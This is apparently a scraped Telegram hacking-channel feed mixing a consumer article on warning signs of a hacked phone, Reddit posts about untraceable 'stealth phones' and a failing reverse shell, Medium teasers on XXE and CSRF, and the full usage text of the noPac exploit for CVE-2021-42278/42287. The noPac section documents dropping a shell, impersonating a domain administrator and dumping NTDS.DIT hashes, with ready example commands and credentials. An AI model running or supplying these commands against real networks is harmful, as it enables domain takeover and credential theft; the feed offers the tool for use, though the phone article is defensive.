Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
How Common is Phone Hacking — and What Are the Common Warning Signs of a Hacked Phone?

Phone hacking can be defined as the process through which an unauthorized person accesses a phone, its data, or its communication. It can involve accessing phone conversations and gaining access to personal details on the phone.

There are different ways through which hackers can access a phone. Some of them include using rogue Wi-Fi networks, tracking software, and phishing attacks, among others. Phone hacking is popular especially because of the growing usage of mobile devices and the immense personal data that these devices carry.

You will find social media details, banking information, phone contacts, and email accounts, among others on your phone. This is information that a hacker can sell or use for identity theft among many other things. Such information has made phone hacking very common. Signs That Your Phone Has Been HackedPhone Running SlowerSlow phone performance is one of the most common signs that your phone has been hacked. Sometimes, you might realize that some mobile applications suddenly hang or crash when you are using them.

You might also encounter a situation where websites take a longer time to load than they used to before. This might be a result of python scripts that create malware to interfere with the processing power or the bandwidth of your phone. It is also a sign that your phone has been hacked. Constantly Getting HotIt is common for a phone to get hot. If you use your phone for long periods for things like gaming or streaming, chances are that it will get hot. However, have you realized that your phone is constantly getting hot even when you are not using it actively?

Well, if you ever find yourself in such a situation, then it means that someone else is using your phone. That could be a hacker and you need to check or scan the phone to block the access that the hacker has. Service or Network DisruptionsExperiencing disruptions in the network or service on your phone is a common occurrence. This might be a result of problems with your network provider. However, network providers have improved their services and disruptions are not frequent.

If you realize that you are constantly experiencing service or network disruptions, your phone might be hacked. This leads to constant bad connections or dropped calls. You might not even be able to send messages at times. New Applications on App DrawerYou might download an application to your phone and maybe forget about it. However, this is not very common. If you realize that you have an application that you cannot remember installing, then that might be a sign that your phone is hacked.

If you have many applications, you might not notice the presence of a malicious app. In case you realize that you have a suspicious application, check for it online before finding out if your iPhone is hacked, and follow the right procedure to get rid of the hacker. Popular Websites are DifferentPopular websites and search engines such as Google might change how their home pages look on special days. However, this happens only for a day. In addition, all websites do not change their home pages on the same day.

If you realize that almost every other website that you visit looks different, it could be a sign that your phone has been hacked. This happens when malware acts as a proxy between the web and yourself. Faster Battery DrainageDifferent reasons may lead to fast drainage of your phone’s battery. The most common one is having many applications running, mostly in the background. The first step to solving this problem is ensuring that background app data is restricted.

After trying everything you can to ensure that your battery consumption is normal, but still drains fast, then that is a sign that your phone might be hacked. Fast Data UsageWe all know t[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials How Common is Phone Hacking — and What Are the Common Warning Signs of a Hacked Phone? Phone hacking can be defined as the process through which an unauthorized person accesses a phone, its data, or its communication. It can involve accessing…
he amount of data we use on our mobile devices, especially when we are not connected to a WiFi network. Sometimes, when on mobile data, you might realize that you are consuming a lot more data than you usually do, even though you are not engaged in any other activity.

It is important to note that if your phone is hacked, it will still use your data to transmit all the information that the hacker is stealing from you. This translates to fast data usage.

Phone hacking is common. As technology advances, cybercriminals are coming up with new strategies to hack mobile devices. If you are going through one or more of the things discussed above, it could be a sign that your phone is hacked.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
are stealth phones legit?

I'm looking for an untraceable (so not even able to use triangulation to find my location) phone and I stumbled across this stealth phone https://x-cellular.com/phones.html



Is this a scam or legit? I'm not sure if it's possible for a phone to have these features.

Thanks.

submitted by /u/JohnWilliams_94
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Why do i get this error when i try to get a reverse shell on windows

I am kinda new to this so sorry if this isnt clear.

i run kali on vbox and listen to a specific port with netcat. then i run a command from this git hub page

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell (scroll all the way down)

and i get this error

ConPtyShellException: [-] ConPtyShellException: WSAConnect failed with error code: 10060
at ConPtyShell.connectRemote(String remoteIp, Int32 remotePort)
at ConPtyShell.SpawnConPtyShell(String remoteIp, Int32 remotePort, UInt32 rows, UInt32 cols, String commandLine, Boolean upgradeShell)
at ConPtyShellMainClass.ConPtyShellMain(String[] args)

i run the command on the same computer as the vmbox. I thought i might be getting this issue because i am running it on the same computer but i tried it on a different one and i got the same error. does anyone know why this happens and how i can fix it

submitted by /u/zuzzeler
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Exploiting Out-of-Band XXE in the Wild

Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding…Continue reading on Medium »
Read more...
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin (https://github.com/WazeHell/sam-the-admin).
Usage SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
[domain/]username[:password]
Account used to authenticate to DC.

optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-ol d-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump Hashs via secretsdump
-use-ldap Use LDAP instead of LDAPS

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos (https://www.kitploit.com/search/label/Kerberos) authentication. Grabs credentials (https://www.kitploit.com/search/label/Credentials) from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (https://www.kitploit.com/search/label/Authentication) (128 or 256 bits)
-dc-host hostname Hostname of the domain controller (https://www.kitploit.com/search/label/Domain%20Controller) to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used

execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)< br/> -share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding (https://www.kitploit.com/search/label/Encoding) used (codec) from the target's output (default "GBK").
-service-name service_name
The name of theservice used to trigger the payload

dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-use r-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE

___________________________
@hacking_Attack
@Hacking_Video
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
-use-vss Use the VSS method insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec
Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap . GetST python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

___________________________
@hacking_Attack
@Hacking_Video
Auto get shell python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator

___________________________
@hacking_Attack
@Hacking_Video
All about: Cross-Site Request Forgery

What is CSRF?Continue reading on Medium »
Read more...